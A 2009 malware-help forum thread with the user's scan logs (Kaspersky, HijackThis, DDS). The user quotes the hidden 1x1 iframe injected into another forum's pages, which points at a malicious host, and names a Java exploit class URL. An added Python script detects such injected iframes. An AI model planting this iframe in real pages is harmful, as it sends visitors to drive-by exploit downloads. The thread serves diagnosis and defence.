Possible infection
29-11-2009 9:34pm
Hi, on Saturday morning I was browsing another forum when the site was attacked. The attack took the form of injecting code for an iframe into the forum pages. The code was:
</table> <!-- / forum rules & forum jump --> <iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe> <br /> <div class="smallfont" align="center">All times are GMT -5. The time now is <span class="time">10:12 PM</span>.</div> <br />
I was using Mozilla SeaMonkey to browse and on first visiting the site I noticed that the Java icon was loaded in my taskbar. This would not usually happen on this forum.
Many other users' anti-virus programs reported a threat, but mine, Microsoft Security Essentials, did not.
AVG reported:
File name: http://centiyo.com/in.cgi?default\{gzip}
Malware Name: HTML:RedirME-inf [Trj]
File Name: http://fuc*thecrisis.biz/lib/index.php
Threat Name: Exploit Javascript Obfuscation (type 714)
I'm now concerned that I may have picked up an infection. I ran MBAM and SUPERAntiSpyware and they came up clean, but the Kaspersky online scanner picked up an infection.
Also I found a file called yearsTend.class in the Java control panel Temporary Files. It came from http://fuc*thecrisis.biz/lib/yearsTend.class
Here are the log files of the scans I've done:
KASPERSKY ONLINE SCANNER 7.0: scan report
Sunday, November 29, 2009
Operating system: Microsoft Windows Vista Home Premium Edition, 32-bit Service Pack 2 (build 6002)
Kaspersky Online Scanner version: 7.0.26.13
Last database update: Sunday, November 29, 2009 02:01:28
Records in database: 3306136
Scan settings:
scan using the following database: extended
Scan archives: yes
Scan e-mail databases: yes
Scan area - My Computer:
C:\
\
E:\
F:\
G:\
H:\
I:\
Scan statistics:
Objects scanned: 189752
Threats found: 2
Infected objects found: 2
Suspicious objects found: 0
Scan duration: 01:50:36
File name / Threat / Threats count
C:\Users\Lennon\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\60c48694-1ccd8d4f Infected: Trojan-Downloader.Java.Agent.ab 1
C:\Users\Lennon\Desktop\default\hnvp2lue.slt\Mail\Local Folders\College Inbox Infected: Email-Worm.Win32.Wallon.a 1
Selected area has been scanned.
Malwarebytes' Anti-Malware 1.41
Database version: 3258
Windows 6.0.6002 Service Pack 2
29/11/2009 20:08:50
mbam-log-2009-11-29 (20-08-50).txt
Scan type: Quick Scan
Objects scanned: 109216
Time elapsed: 3 minute(s), 29 second(s)
Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0
Memory Processes Infected:
(No malicious items detected)
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
(No malicious items detected)
Registry Values Infected:
(No malicious items detected)
Registry Data Items Infected:
(No malicious items detected)
Folders Infected:
(No malicious items detected)
Files Infected:
(No malicious items detected)
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:10:36, on 29/11/2009
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18828)
Boot mode: Normal
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\Dell Support Center\bin\sprtcmd.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Microsoft Security Essentials\msseces.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\SABnzbd\SABnzbd.exe
C:\Program Files\AutoHotkey\AutoHotkey.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files\Mozilla Thunderbird\thunderbird.exe
C:\Program Files\SeaMonkey\seamonkey.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\NOTEPAD.EXE
C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\SearchFilterHost.exe
C:\Users\Lennon\Desktop\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ie/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer provided by Dell
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: Shareaza Web Download Hook - {0EEDB912-C5FA-486F-8334-57288578C627} - C:\Program Files\Shareaza\RazaWebHook32.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Browser Address Error Redirector - {CA6319C0-31B7-401E-A518-A07C3DB8F777} - C:\Program Files\Dell\BAE\BAE.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [dscactivate] "C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe"
O4 - HKLM\..\Run: [DellSupportCenter] "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P DellSupportCenter
O4 - HKLM\..\Run: [COMODO Firewall Pro] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [COMODO Internet Security] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [MSSE] "c:\Program Files\Microsoft Security Essentials\msseces.exe" -hide
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKCU\..\Run: [DellSupportCenter] "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P DellSupportCenter
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Google Update] "C:\Users\Lennon\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-1411996874-1301283773-3185572280-1003\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'postgres')
O4 - Global Startup: SABnzbd.lnk = C:\Program Files\SABnzbd\SABnzbd.exe
O4 - Global Startup: WindowPad.ahk.lnk = C:\AHK\WindowPad\WindowPad.ahk
O8 - Extra context menu item: Download with &Shareaza - res://C:\Program Files\Shareaza\RazaWebHook32.dll/3000
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Titan Poker - {49783ED4-258D-4f9f-BE11-137C18D3E543} - C:\Poker\Titan Poker\casino.exe
O9 - Extra 'Tools' menuitem: Titan Poker - {49783ED4-258D-4f9f-BE11-137C18D3E543} - C:\Poker\Titan Poker\casino.exe
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
O9 - Extra button: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Poker\CDPoker\casino.exe
O9 - Extra 'Tools' menuitem: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Poker\CDPoker\casino.exe
O9 - Extra button: Gnuf Poker - {A99C8F70-4D5B-482c-8854-05BC0BB8B182} - C:\Gnuf\Poker\MPPoker.exe
O9 - Extra button: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Poker\Noble Poker\casino.exe
O9 - Extra 'Tools' menuitem: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Poker\Noble Poker\casino.exe
O9 - Extra button: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Programs\PartyGaming\PartyPoker\RunApp.exe
O9 - Extra 'Tools' menuitem: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Programs\PartyGaming\PartyPoker\RunApp.exe
O9 - Extra button: Purple Lounge - {00000000-0000-0000-0000-000000000000} - C:\MicroGaming\Poker\PurpleLoungeMPP\MPPoker.exe (HKCU)
O9 - Extra button: CarbonPoker - {e4e8c758-34b4-44bb-8ef9-1f0786e81d2d} - C:\Users\Lennon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CarbonPoker\CarbonPoker.lnk (file missing) (HKCU)
O13 - Gopher Prefix:
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O16 - DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} (FlashXControl Object) - https://mppv2flash3.valueactive.com/PokerShare/FlashAX.cab
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
O17 - HKLM\System\CS1\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
O17 - HKLM\System\CS2\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
O20 - AppInit_DLLs: C:\Windows\system32\guard32.dll
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Andrea RT Filters Service (AERTFilters) - Andrea Electronics Corporation - C:\Windows\system32\AERTSrv.exe
O23 - Service: AMD External Events Utility - AMD - C:\Windows\system32\atiesrxx.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: COMODO Internet Security Helper Service (cmdAgent) - COMODO - C:\Program Files\COMODO\Firewall\cmdagent.exe
O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe
O23 - Service: Google Update Service (gupdate1c9e852b942f080) (gupdate1c9e852b942f080) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: PostgreSQL Server 8.3 (postgresql-8.3) - PostgreSQL Global Development Group - C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies, Inc. - C:\Program Files\WinPcap\rpcapd.exe
O23 - Service: SupportSoft Sprocket Service (dellsupportcenter) (sprtsvc_dellsupportcenter) - SupportSoft, Inc. - C:\Program Files\Dell Support Center\bin\sprtsvc.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: TVersityMediaServer - Unknown owner - C:\Users\Lennon\AppData\Local\TVersity\Media Server\MediaServer.exe
--
End of file - 9277 bytes
Rooter.exe (v1.0.2) by Eric_71
.
SeDebugPrivilege granted successfully ...
.
Windows Vista Home Edition (6.0.6002) Service Pack 2
[32_bits] - x86 Family 6 Model 15 Stepping 11, GenuineIntel
.
[wscsvc] (Security Center) RUNNING (state:4)
[MpsSvc] RUNNING (state:4)
Windows Firewall -> Disabled !
Windows Defender -> Disabled !
User Account Control (UAC) -> Disabled !
.
Internet Explorer 8.0.6001.18828
Mozilla Firefox 3.5.5 (en-GB)
.
C:\ [Fixed-NTFS] .. ( Total:239 Go - Free:92 Go )
\ [Fixed-NTFS] .. ( Total:9 Go - Free:5 Go )
E:\ [CD_Rom]
F:\ [Removable]
G:\ [Removable]
H:\ [Removable]
I:\ [Removable]
.
Scan : 20:11.25
Path : C:\Users\Lennon\Desktop\Rooter.exe
User : Lennon ( Administrator -> YES )
.
\\ Processes
.
Locked [System Process] (0)
Locked System (4)
______ \SystemRoot\System32\smss.exe (536)
______ C:\Windows\system32\csrss.exe (604)
______ C:\Windows\system32\wininit.exe (668)
______ C:\Windows\system32\csrss.exe (680)
______ C:\Windows\system32\services.exe (712)
______ C:\Windows\system32\lsass.exe (724)
______ C:\Windows\system32\lsm.exe (732)
______ C:\Windows\system32\svchost.exe (884)
______ C:\Windows\system32\winlogon.exe (896)
______ C:\Windows\system32\svchost.exe (968)
______ C:\Program Files\COMODO\Firewall\cmdagent.exe (1008)
______ C:\Windows\system32\svchost.exe (1056)
______ c:\Program Files\Microsoft Security Essentials\MsMpEng.exe (1076)
______ C:\Windows\system32\atiesrxx.exe (1280)
______ C:\Windows\System32\svchost.exe (1328)
______ C:\Windows\System32\svchost.exe (1372)
______ C:\Windows\system32\svchost.exe (1384)
Locked audiodg.exe (1476)
______ C:\Windows\system32\svchost.exe (1500)
______ C:\Windows\system32\SLsvc.exe (1520)
______ C:\Windows\system32\svchost.exe (1548)
______ C:\Windows\system32\atieclxx.exe (1704)
______ C:\Windows\System32\spoolsv.exe (1964)
______ C:\Windows\system32\svchost.exe (1996)
______ C:\Windows\system32\taskeng.exe (1316)
______ C:\Windows\system32\Dwm.exe (1720)
______ C:\Windows\Explorer.EXE (352)
______ C:\Windows\system32\taskeng.exe (2084)
______ C:\Program Files\Google\Update\1.2.183.13\GoogleCrashHandler.exe (2192)
______ C:\Program Files\Dell Support Center\bin\sprtcmd.exe (2336)
______ C:\Program Files\COMODO\Firewall\cfp.exe (2344)
______ C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (2448)
______ C:\Windows\RtHDVCpl.exe (2524)
______ C:\Program Files\Microsoft Security Essentials\msseces.exe (2612)
______ C:\Program Files\iTunes\iTunesHelper.exe (2624)
______ C:\Program Files\Java\jre6\bin\jusched.exe (2632)
______ C:\Windows\ehome\ehtray.exe (2648)
______ C:\Windows\system32\AERTSrv.exe (2828)
______ C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe (2840)
______ C:\Program Files\Bonjour\mDNSResponder.exe (2852)
______ C:\Windows\ehome\ehmsas.exe (3216)
______ C:\Program Files\SABnzbd\SABnzbd.exe (3228)
______ C:\Program Files\AutoHotkey\AutoHotkey.exe (3244)
______ C:\Windows\System32\svchost.exe (3360)
______ C:\Windows\system32\svchost.exe (3372)
______ C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (3656)
______ C:\Program Files\PostgreSQL\8.3\bin\pg_ctl.exe (3784)
______ C:\Program Files\Dell Support Center\bin\sprtsvc.exe (3800)
______ C:\Windows\system32\svchost.exe (3816)
______ C:\Windows\System32\svchost.exe (3892)
______ C:\Windows\system32\SearchIndexer.exe (3912)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (4072)
______ C:\Windows\system32\WUDFHost.exe (2532)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (2792)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (1556)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (2992)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (3076)
______ C:\Program Files\iPod\bin\iPodService.exe (3432)
______ C:\Windows\system32\SearchProtocolHost.exe (1464)
______ C:\Program Files\Mozilla Thunderbird\thunderbird.exe (5376)
______ C:\Program Files\SeaMonkey\seamonkey.exe (4708)
______ C:\Program Files\Mozilla Firefox\firefox.exe (6056)
______ C:\Windows\system32\NOTEPAD.EXE (1664)
______ C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe (5120)
______ C:\Windows\system32\NOTEPAD.EXE (4836)
______ C:\Windows\system32\SearchFilterHost.exe (4796)
______ C:\Users\Lennon\Desktop\HijackThis.exe (2996)
______ C:\Windows\system32\wbem\wmiprvse.exe (5476)
______ C:\Windows\system32\NOTEPAD.EXE (1204)
______ C:\Users\Lennon\Desktop\Rooter.exe (1092)
.
\\ Device\Harddisk0\
.
\Device\Harddisk0 [Sectors : 63 x 512 Bytes]
.
\Device\Harddisk0\Partition1 (Start_Offset:32256 | Length:73995264)
\Device\Harddisk0\Partition2 (Start_Offset:74448896 | Length:10737418240)
\Device\Harddisk0\Partition3 --[ MBR ]-- (Start_Offset:10811867136 | Length:256830865408)
\Device\Harddisk0\Partition0 (Start_Offset:267642732544 | Length:52428800000)
\Device\Harddisk0\Partition4 (Start_Offset:267643781120 | Length:52427751424)
.
\\ Scheduled Tasks
.
C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1411996874-1301283773-3185572280-1001Core.job
C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1411996874-1301283773-3185572280-1001UA.job
C:\Windows\Tasks\SA.DAT
C:\Windows\Tasks\SCHEDLGU.TXT
.
\\ Registry
.
.
\\ Files & Folders
.
\\ Scan completed at 20:11.39
.
C:\Rooter$\Rooter_1.txt - (29/11/2009 | 20:11.39)
I would be grateful if someone could tell me if these look ok. Thanks in advance.
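As an added example (not code from the original post or from any of the scanners it mentions), here is a small Python check a forum operator can run over their own served pages or templates to catch the kind of hidden-iframe injection described above. The sample page body is constructed: it wraps the injected fragment quoted in the post together with a benign same-host iframe, and the forum URL is a made-up placeholder.

```python
"""Flag hidden or injected <iframe> elements in an HTML page.

Added example for the thread above, not code from the original post or from
any of the scanners it mentions. A site operator who suspects a page
injection can run this over their own templates or served pages: it reports
iframes that are 1x1 or smaller, hidden by inline CSS, or pointing at a host
other than the page's own.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page URL (placeholder, not the forum from the post).
PAGE_URL = "http://forum.example/showthread.php?t=1"

# Constructed page body: the injected fragment quoted in the post, preceded by
# a benign same-host iframe so the check has something it should NOT flag.
SAMPLE_HTML = """
<div><iframe src="http://forum.example/embed/poll" width="400" height="300"></iframe></div>
</table> <!-- / forum rules & forum jump -->
<iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe>
<br />
<div class="smallfont" align="center">All times are GMT -5.</div>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lowercases tag and attribute names
            self.iframes.append({name: (value or "") for name, value in attrs})


def is_tiny(value):
    """True when a width/height attribute is 1 pixel or less."""
    text = value.strip().lower()
    if text.endswith("px"):
        text = text[:-2]
    try:
        return float(text) <= 1
    except ValueError:
        return False


def suspicious_iframes(html, page_url):
    """Return [(src, [reason, ...]), ...] for iframes that look injected."""
    collector = IframeCollector()
    collector.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        reasons = []
        # Drive-by injections are typically sized so the frame is invisible.
        if is_tiny(attrs.get("width", "")) and is_tiny(attrs.get("height", "")):
            reasons.append("1x1 or smaller")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        # A frame loading content from a host the page does not own is the
        # other strong signal; relative URLs have no host and are skipped.
        src_host = (urlparse(src).hostname or "").lower()
        if src_host and src_host != page_host:
            reasons.append("third-party host " + src_host)
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_HTML, PAGE_URL):
        print("suspicious iframe:", src, "->", "; ".join(reasons))
```

Run against the constructed sample it reports only the 1x1 frame pointing at centiyo.com; the same-host 400x300 poll frame is left alone. On a real site the two signals are worth treating separately: a tiny frame on a third-party host is the classic injection pattern, while a hidden same-host frame may be legitimate template code.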
Comments
looks ok
Please download DDS and save it to your desktop.
- Disable any script blocking protection
- Double click dds.pif to run the tool.
- When done, two DDS.txts will open.
- Save both reports to your desktop.
Please include the contents of the following in your next reply:
DDS.txt
Attach.txt
Thanks very much for the quick response. Here are the requested files:
DDS (Ver_09-11-29.01) - NTFSx86
Run by Lennon at 0:10:26.94 on 30/11/2009
Internet Explorer: 8.0.6001.18828 BrowserJavaVersion: 1.6.0_17
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.353.1033.18.3069.1420 [GMT 0:00]
SP: COMODO Defense+ *enabled* (Updated) {043803A4-4F86-4ef7-AFC5-F6E02A79969B}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}
SP: SUPERAntiSpyware *disabled* (Updated) {222A897C-5018-402e-943F-7E7AC8560DA7}
FW: COMODO Firewall *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}
============== Running Processes ===============
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Program Files\COMODO\Firewall\cmdagent.exe
C:\Windows\system32\svchost.exe -k NetworkService
c:\Program Files\Microsoft Security Essentials\MsMpEng.exe
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\Google\Update\1.2.183.13\GoogleCrashHandler.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Microsoft Security Essentials\msseces.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\system32\AERTSrv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\SABnzbd\SABnzbd.exe
C:\Program Files\AutoHotkey\AutoHotkey.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files\PostgreSQL\8.3\bin\pg_ctl.exe
C:\Program Files\Dell Support Center\bin\sprtsvc.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Windows\system32\WUDFHost.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\SeaMonkey\seamonkey.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
c:\Program Files\Microsoft Security Essentials\MpCmdRun.exe
C:\Users\Lennon\Desktop\dds.pif
C:\Windows\system32\conime.exe
C:\Windows\system32\wbem\wmiprvse.exe
============== Pseudo HJT Report ===============
uStart Page = hxxp://www.google.ie/
uWindow Title = Internet Explorer provided by Dell
uInternet Settings,ProxyOverride = *.local
BHO: Shareaza Web Download Hook: {0eedb912-c5fa-486f-8334-57288578c627} - c:\program files\shareaza\RazaWebHook32.dll
BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - No File
BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: CBrowserHelperObject Object: {ca6319c0-31b7-401e-a518-a07c3db8f777} - c:\program files\dell\bae\BAE.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
uRun: [DellSupportCenter] "c:\program files\dell support center\bin\sprtcmd.exe" /P DellSupportCenter
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [Google Update] "c:\users\lennon\appdata\local\google\update\GoogleUpdate.exe" /c
mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
mRun: [StartCCC] "c:\program files\ati technologies\ati.ace\core-static\CLIStart.exe" MSRun
mRun: [dscactivate] "c:\program files\dell support center\gs_agent\custom\dsca.exe"
mRun: [DellSupportCenter] "c:\program files\dell support center\bin\sprtcmd.exe" /P DellSupportCenter
mRun: [COMODO Firewall Pro] "c:\program files\comodo\firewall\cfp.exe" -h
mRun: [AppleSyncNotifier] c:\program files\common files\apple\mobile device support\bin\AppleSyncNotifier.exe
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [COMODO Internet Security] "c:\program files\comodo\firewall\cfp.exe" -h
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [MSSE] "c:\program files\microsoft security essentials\msseces.exe" -hide
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [SunJavaUpdateSched] "c:\program files\java\jre6\bin\jusched.exe"
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\sabnzbd.lnk - c:\program files\sabnzbd\SABnzbd.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\window~1.lnk - c:\ahk\windowpad\WindowPad.ahk
mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
mPolicies-system: EnableLUA = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
IE: Download with &Shareaza - c:\program files\shareaza\RazaWebHook32.dll/3000
IE: E&xport to Microsoft Excel - c:\progra~1\micros~3\office11\EXCEL.EXE/3000
IE: {49783ED4-258D-4f9f-BE11-137C18D3E543} - c:\poker\titan poker\casino.exe
IE: {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - c:\poker\cdpoker\casino.exe
IE: {A99C8F70-4D5B-482c-8854-05BC0BB8B182} - c:\gnuf\poker\MPPoker.exe
IE: {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - c:\poker\noble poker\casino.exe
IE: {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - c:\programs\partygaming\partypoker\RunApp.exe
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\micros~3\office11\REFIEBAR.DLL
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
